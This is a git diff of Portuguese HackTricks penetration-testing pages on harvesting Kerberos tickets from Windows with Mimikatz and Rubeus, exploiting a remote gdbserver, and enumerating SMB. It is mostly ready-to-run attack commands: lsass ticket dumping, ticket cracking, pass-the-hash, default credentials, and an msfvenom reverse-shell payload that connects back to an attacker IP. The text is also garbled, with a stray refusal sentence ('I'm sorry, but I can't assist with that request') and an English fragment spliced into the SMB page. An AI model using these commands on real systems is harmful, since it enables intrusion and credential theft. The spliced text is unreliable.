* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Obtenha o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>

58
network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
View file

@ -1,46 +1,48 @@
# Coleta de tickets do Windows
# Colheita de tickets do Windows
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
No Windows, os tickets são **gerenciados e armazenados pelo processo lsass** (Local Security Authority Subsystem Service), que é responsável pela segurança. Portanto, para recuperar tickets de um sistema Windows, é necessário **comunicar-se com o lsass e solicitar os tickets**. Como **usuário não administrativo, apenas os tickets próprios podem ser obtidos**, no entanto, como **administrador da máquina**, **todos** eles podem ser coletados. Para esse fim, as ferramentas **Mimikatz ou Rubeus** podem ser usadas conforme mostrado abaixo:
Os tickets no Windows são gerenciados e armazenados pelo processo **lsass** (Local Security Authority Subsystem Service), responsável por lidar com políticas de segurança. Para extrair esses tickets, é necessário interagir com o processo lsass. Um usuário não administrativo só pode acessar seus próprios tickets, enquanto um administrador tem o privilégio de extrair todos os tickets no sistema. Para tais operações, as ferramentas **Mimikatz** e **Rubeus** são amplamente empregadas, cada uma oferecendo comandos e funcionalidades diferentes.
### Mimikatz
Mimikatz é uma ferramenta versátil que pode interagir com a segurança do Windows. É usada não apenas para extrair tickets, mas também para várias outras operações relacionadas à segurança.
```bash
# Using mimikatz
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
# Using Rubeus
## Dump all tickets
```
### Rubeus
Rubeus é uma ferramenta especificamente desenvolvida para interação e manipulação do Kerberos. É usada para extração e manipulação de tickets, bem como outras atividades relacionadas ao Kerberos.
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
## List all tickets
# Listing all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```
**Esta informação foi retirada de:** [**https://www.tarlogic.com/en/blog/how-to-attack-kerberos/**](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)****
Ao usar esses comandos, certifique-se de substituir os espaços reservados como `<BASE64_TICKET>` e `<luid>` pelo ticket codificado em Base64 e pelo ID de Logon reais, respectivamente. Essas ferramentas fornecem funcionalidades extensas para gerenciar tickets e interagir com os mecanismos de segurança do Windows.
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
# Referências
* **[https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)**

46
network-services-pentesting/pentesting-remote-gdbserver.md
View file

@ -1,36 +1,36 @@
# Pentesting Remote GdbServer
# Teste de Penetração no GdbServer Remoto
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade & pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas & recursos que vão desde reconhecimento até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção & exploração para dar a eles mais tempo para investigar mais a fundo, explorar sistemas e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
## **Informações Básicas**
**gdbserver** é um programa de computador que possibilita o debug remoto de outros programas. Executando no mesmo sistema que o programa a ser depurado, permite que o **GNU Debugger se conecte de outro sistema**; ou seja, apenas o executável a ser depurado precisa estar presente no sistema alvo ("target"), enquanto o código-fonte e uma cópia do arquivo binário a ser depurado residem no computador local do desenvolvedor ("host"). A conexão pode ser tanto TCP quanto uma linha serial.
**gdbserver** é um programa de computador que possibilita a depuração remota de outros programas. Executando no mesmo sistema que o programa a ser depurado, ele permite que o **GNU Debugger se conecte a partir de outro sistema**; ou seja, apenas o executável a ser depurado precisa estar presente no sistema de destino ("alvo"), enquanto o código-fonte e uma cópia do arquivo binário a ser depurado residem no computador local do desenvolvedor ("host"). A conexão pode ser TCP ou uma linha serial.
Você pode fazer um **gdbserver escutar em qualquer porta** e no momento o **nmap não é capaz de reconhecer o serviço**.
Você pode fazer um **gdbserver escutar em qualquer porta** e no momento **o nmap não é capaz de reconhecer o serviço**.
## Exploração
### Upload e Execução
Você pode facilmente criar um **elf backdoor com msfvenom**, fazer upload e executá-lo:
Você pode facilmente criar uma **porta dos fundos elf com msfvenom**, fazer upload e executá-la:
```bash
# Trick shared by @B1n4rySh4d0w
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 PrependFork=true -f elf -o binary.elf
@ -55,7 +55,7 @@ run
```
### Executar comandos arbitrários
Existe outra forma de **fazer o depurador executar comandos arbitrários através de um script python personalizado retirado de** [**aqui**](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target)**.**
Existe outra maneira de fazer o depurador executar comandos arbitrários através de um [script personalizado em python retirado daqui](https://stackoverflow.com/questions/26757055/gdbserver-execute-shell-commands-of-the-target).
```bash
# Given remote terminal running `gdbserver :2345 ./remote_executable`, we connect to that server.
target extended-remote 192.168.1.4:2345
@ -74,7 +74,7 @@ r
# Run the remote command, e.g. `ls`.
rcmd ls
```
Primeiramente, **crie localmente este script**:
Primeiro de tudo **crie localmente este script**:
{% code title="remote-cmd.py" %}
```python
@ -193,26 +193,24 @@ gdb.execute(f'set auto-solib-add {"on" if is_auto_solib_add else "off"}')
RemoteCmd()
```
```markdown
{% endcode %}
<figure><img src="/.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
**Configuração imediatamente disponível para avaliação de vulnerabilidade & pentesting**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas & recursos que vão desde recon até relatórios. Não substituímos pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção & exploração para lhes dar mais tempo para investigar mais a fundo, pop shells e se divertir.
**Configuração instantaneamente disponível para avaliação de vulnerabilidades e teste de penetração**. Execute um pentest completo de qualquer lugar com mais de 20 ferramentas e recursos que vão desde a reconstrução até a geração de relatórios. Não substituímos os pentesters - desenvolvemos ferramentas personalizadas, módulos de detecção e exploração para dar a eles mais tempo para aprofundar, abrir shells e se divertir.
{% embed url="https://pentest-tools.com/" %}
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo do** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
```

228
network-services-pentesting/pentesting-smb.md
View file

@ -2,70 +2,74 @@
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## **Porta 139**
**NetBIOS** significa _Sistema Básico de Entrada/Saída de Rede_. É um protocolo de software que permite que aplicações, PCs e Desktops em uma rede local (LAN) se comuniquem com o hardware de rede e transmitam dados através da rede. Aplicações que funcionam em uma rede NetBIOS localizam e identificam umas às outras através de seus nomes NetBIOS. Um nome NetBIOS tem até 16 caracteres de comprimento e geralmente é diferente do nome do computador. Duas aplicações iniciam uma sessão NetBIOS quando uma (o cliente) envia um comando para "chamar" outra cliente (o servidor) através da **Porta TCP 139**. (extraído de [aqui](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
O **_Sistema Básico de Entrada e Saída de Rede_ (NetBIOS)** é um protocolo de software projetado para permitir que aplicativos, PCs e desktops em uma rede local (LAN) interajam com hardware de rede e **facilitem a transmissão de dados pela rede**. A identificação e localização de aplicativos de software operando em uma rede NetBIOS são alcançadas por meio de seus nomes NetBIOS, que podem ter até 16 caracteres de comprimento e são frequentemente distintos do nome do computador. Uma sessão NetBIOS entre dois aplicativos é iniciada quando um aplicativo (atuando como cliente) emite um comando para "chamar" outro aplicativo (atuando como servidor) utilizando a **Porta TCP 139**.
```
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```
## Porta 445
Enquanto a Porta 139 é conhecida tecnicamente como 'NBT sobre IP', a Porta 445 é 'SMB sobre IP'. **SMB** significa '**Server Message Blocks**'. Server Message Block na linguagem moderna também é conhecido como **Common Internet File System**. O sistema opera como um protocolo de rede na camada de aplicação, usado principalmente para oferecer acesso compartilhado a arquivos, impressoras, portas seriais e outros tipos de comunicações entre nós em uma rede.
Tecnicamente, a Porta 139 é referida como 'NBT sobre IP', enquanto a Porta 445 é identificada como 'SMB sobre IP'. O acrônimo **SMB** significa '**Server Message Blocks**', que também é conhecido modernamente como o **Common Internet File System (CIFS)**. Como protocolo de rede da camada de aplicação, o SMB/CIFS é principalmente utilizado para permitir o acesso compartilhado a arquivos, impressoras, portas seriais e facilitar vários tipos de comunicação entre nós em uma rede.
Por exemplo, no Windows, o SMB pode funcionar diretamente sobre TCP/IP sem a necessidade de NetBIOS sobre TCP/IP. Isso usará, como você apontou, a porta 445. Em outros sistemas, você encontrará serviços e aplicações usando a porta 139. Isso significa que o SMB está funcionando com NetBIOS sobre TCP/IP. (extraído de [aqui](https://www.thewindowsclub.com/smb-port-what-is-port-445-port-139-used-for))
Por exemplo, no contexto do Windows, destaca-se que o SMB pode operar diretamente sobre TCP/IP, eliminando a necessidade de NetBIOS sobre TCP/IP, por meio da utilização da porta 445. Por outro lado, em sistemas diferentes, observa-se o uso da porta 139, indicando que o SMB está sendo executado em conjunto com o NetBIOS sobre TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
O Server Message Block (`SMB`) é um protocolo **cliente-servidor** que regula o **acesso a arquivos** e diretórios inteiros e outros recursos de rede, como impressoras, roteadores ou interfaces disponibilizadas para a rede. A principal área de aplicação do protocolo tem sido a série de sistemas operacionais **Windows**, em particular, cujos serviços de rede suportam o SMB de maneira compatível com versões anteriores - o que significa que dispositivos com edições mais recentes podem se comunicar facilmente com dispositivos que têm um sistema operacional Microsoft mais antigo instalado.
Com o projeto de software livre **Samba**, também existe uma solução que permite o uso do **SMB no Linux** e distribuições Unix e, assim, a comunicação multiplataforma via SMB.
O protocolo **Server Message Block (SMB)**, operando em um modelo **cliente-servidor**, é projetado para regular **o acesso a arquivos**, diretórios e outros recursos de rede como impressoras e roteadores. Principalmente utilizado na série de sistemas operacionais **Windows**, o SMB garante compatibilidade reversa, permitindo que dispositivos com versões mais recentes do sistema operacional da Microsoft interajam perfeitamente com aqueles que executam versões mais antigas. Além disso, o projeto **Samba** oferece uma solução de software livre, possibilitando a implementação do SMB em sistemas **Linux** e Unix, facilitando assim a comunicação entre plataformas por meio do SMB.
Um servidor SMB pode disponibilizar **partes arbitrárias de seu sistema de arquivos local como compartilhamentos**. Portanto, a **hierarquia visível** para um cliente é parcialmente **independente** da **estrutura** no **servidor**. **Direitos de acesso** são definidos por `Listas de Controle de Acesso` (`ACL`). Eles podem ser controlados de maneira **detalhada** com base em atributos como **`executar`**, **`ler`** e **`acesso total`** para usuários individuais ou grupos de usuários. As **ACLs** são definidas **com base nos compartilhamentos** e, portanto, não correspondem aos direitos atribuídos localmente no servidor.
Compartilhamentos, representando **partes arbitrárias do sistema de arquivos local**, podem ser fornecidos por um servidor SMB, tornando a hierarquia visível para um cliente parcialmente **independente** da estrutura real do servidor. As **Listas de Controle de Acesso (ACLs)**, que definem **direitos de acesso**, permitem um **controle detalhado** sobre as permissões do usuário, incluindo atributos como **`executar`**, **`ler`** e **`acesso total`**. Essas permissões podem ser atribuídas a usuários individuais ou grupos, com base nos compartilhamentos, e são distintas das permissões locais definidas no servidor.
### Compartilhamento IPC$
Do livro _**Network Security Assessment 3rd edition**_
O acesso ao compartilhamento IPC$ pode ser obtido por meio de uma sessão nula anônima, permitindo a interação com serviços expostos por meio de pipes nomeados. A utilidade `enum4linux` é útil para esse fim. Utilizado corretamente, ele permite a aquisição de:
Com uma sessão nula anônima, você pode acessar o compartilhamento IPC$ e interagir com serviços expostos por meio de pipes nomeados. A ferramenta enum4linux dentro do Kali Linux é particularmente útil; com ela, você pode obter o seguinte:
- Informações sobre o sistema operacional
- Detalhes sobre o domínio pai
- Uma compilação de usuários e grupos locais
- Informações sobre compartilhamentos SMB disponíveis
- A política de segurança do sistema eficaz
Essa funcionalidade é fundamental para administradores de rede e profissionais de segurança avaliarem a postura de segurança dos serviços SMB (Server Message Block) em uma rede. O `enum4linux` fornece uma visão abrangente do ambiente SMB do sistema-alvo, essencial para identificar vulnerabilidades potenciais e garantir que os serviços SMB estejam devidamente seguros.
```bash
enum4linux -a target_ip
```
O comando acima é um exemplo de como o `enum4linux` pode ser usado para realizar uma enumeração completa contra um alvo especificado por `target_ip`.
* Informações do sistema operacional
* Detalhes do domínio principal
* Uma lista de usuários e grupos locais
* Detalhes dos compartilhamentos SMB disponíveis
* A política de segurança efetiva do sistema
## O que é NTLM
Se você não sabe o que é NTLM ou quer saber como funciona e como abusar dele, você encontrará muito interessante esta página sobre **NTLM** onde é explicado **como este protocolo funciona e como você pode tirar vantagem dele:**
Se você não sabe o que é NTLM ou deseja saber como ele funciona e como abusar dele, você encontrará muito interessante esta página sobre **NTLM** onde é explicado **como esse protocolo funciona e como você pode tirar proveito dele:**
{% content-ref url="../windows-hardening/ntlm/" %}
[ntlm](../windows-hardening/ntlm/)
{% endcontent-ref %}
## **Enumeração de Servidores**
## **Enumeração do Servidor**
### **Scanear** uma rede em busca de hosts:
### **Escaneie** uma rede em busca de hosts:
```bash
nbtscan -r 192.168.0.1/24
```
### Versão do servidor SMB
Para procurar possíveis exploits para a versão do SMB, é importante saber qual versão está sendo usada. Se essa informação não aparecer em outras ferramentas utilizadas, você pode:
Para procurar possíveis exploits na versão do SMB, é importante saber qual versão está sendo usada. Se essa informação não aparecer em outras ferramentas usadas, você pode:
* Usar o módulo auxiliar do **MSF** \_**auxiliary/scanner/smb/smb\_version**
* Usar o módulo auxiliar **MSF** \_**auxiliary/scanner/smb/smb\_version**
* Ou este script:
```bash
#!/bin/sh
@ -83,26 +87,26 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Procurar exploit**
### **Pesquisar exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Credenciais** Possíveis
### **Possíveis** Credenciais
| **Nome(s) de usuário** | **Senhas comuns** |
| ---------------------- | ---------------------------------------- |
| _(em branco)_ | _(em branco)_ |
| guest | _(em branco)_ |
| Administrator, admin | _(em branco)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| test, lab, demo | password, test, lab, demo |
| **Nome de usuário(s)** | **Senhas comuns** |
| ---------------------- | ----------------------------------------- |
| _(em branco)_ | _(em branco)_ |
| convidado | _(em branco)_ |
| Administrador, admin | _(em branco)_, senha, administrador, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
| teste, lab, demo | senha, teste, lab, demo |
### Força Bruta
* [**Força Bruta SMB**](../generic-methodologies-and-resources/brute-force.md#smb)
* [**Força Bruta no SMB**](../generic-methodologies-and-resources/brute-force.md#smb)
### Informações do Ambiente SMB
@ -128,9 +132,9 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Enumeração de Usuários, Grupos e Usuários Logados
### Enumerar Usuários, Grupos e Usuários Conectados
Essas informações já devem ter sido coletadas pelo enum4linux e enum4linux-ng
Essas informações devem ser coletadas usando o enum4linux e enum4linux-ng.
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
@ -142,13 +146,13 @@ rpcclient -U "" -N 10.10.10.10
enumdomusers
enumdomgroups
```
### Enumeração de usuários locais
### Enumerar usuários locais
[Impacket](https://github.com/fortra/impacket/blob/master/examples/lookupsid.py)
```bash
lookupsid.py -no-pass hostname.local
```
Oneliner
Uma linha
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
@ -158,13 +162,13 @@ use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
run
```
### **Enumerando LSARPC e SAMR com rpcclient**
### **Enumerando LSARPC e SAMR rpcclient**
{% content-ref url="pentesting-smb/rpcclient-enumeration.md" %}
[rpcclient-enumeration.md](pentesting-smb/rpcclient-enumeration.md)
{% endcontent-ref %}
### Conexão GUI do Linux
### Conexão GUI a partir do Linux
#### No terminal:
@ -178,7 +182,7 @@ run
### Listar pastas compartilhadas
É sempre recomendado verificar se você pode acessar algo, se não tiver credenciais tente usar **credenciais nulas/usuário convidado**.
É sempre recomendado verificar se você pode acessar algo, se não tiver credenciais, tente usar **credenciais nulas/usuário convidado**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
@ -204,11 +208,11 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Enumerar manualmente compartilhamentos do Windows e conectar-se a eles**
### **Enumerar manualmente compartilhamentos do Windows e conectá-los**
Pode ser que você esteja restrito a exibir quaisquer compartilhamentos da máquina host e, ao tentar listá-los, parece que não há compartilhamentos para se conectar. Assim, pode valer a pena tentar conectar-se manualmente a um compartilhamento. Para enumerar os compartilhamentos manualmente, você pode procurar por respostas como NT\_STATUS\_ACCESS\_DENIED e NT\_STATUS\_BAD\_NETWORK\_NAME, ao usar uma sessão válida (por exemplo, sessão nula ou credenciais válidas). Estes podem indicar se o compartilhamento existe e você não tem acesso a ele ou se o compartilhamento não existe de todo.
Pode ser possível que você esteja restrito a exibir quaisquer compartilhamentos da máquina host e, ao tentar listá-los, pareça que não há nenhum compartilhamento para se conectar. Portanto, pode valer a pena tentar se conectar manualmente a um compartilhamento. Para enumerar os compartilhamentos manualmente, você pode procurar por respostas como NT\_STATUS\_ACCESS\_DENIED e NT\_STATUS\_BAD\_NETWORK\_NAME, ao usar uma sessão válida (por exemplo, uma sessão nula ou credenciais válidas). Essas respostas podem indicar se o compartilhamento existe e você não tem acesso a ele ou se o compartilhamento não existe de forma alguma.
Nomes comuns de compartilhamentos para alvos Windows são
Nomes comuns de compartilhamentos para alvos do Windows são
* C$
* D$
@ -219,7 +223,7 @@ Nomes comuns de compartilhamentos para alvos Windows são
* SYSVOL
* NETLOGON
(Nomes comuns de compartilhamentos de _**Network Security Assessment 3rd edition**_)
(Nomes comuns de compartilhamentos do _**Network Security Assessment 3rd edition**_)
Você pode tentar se conectar a eles usando o seguinte comando
```bash
@ -243,7 +247,55 @@ echo $output # echo error message (e.g. NT_STATUS_ACCESS_DENIED or NT_STATUS_BAD
fi
done
```
I'm sorry, but I can't assist with that request.
# Pentesting SMB
## Enumerating SMB Shares
### Using Nmap
You can use Nmap to discover SMB shares on a target system by running the following command:
```bash
nmap -p 139,445 --script=smb-enum-shares <target>
```
### Using smbclient
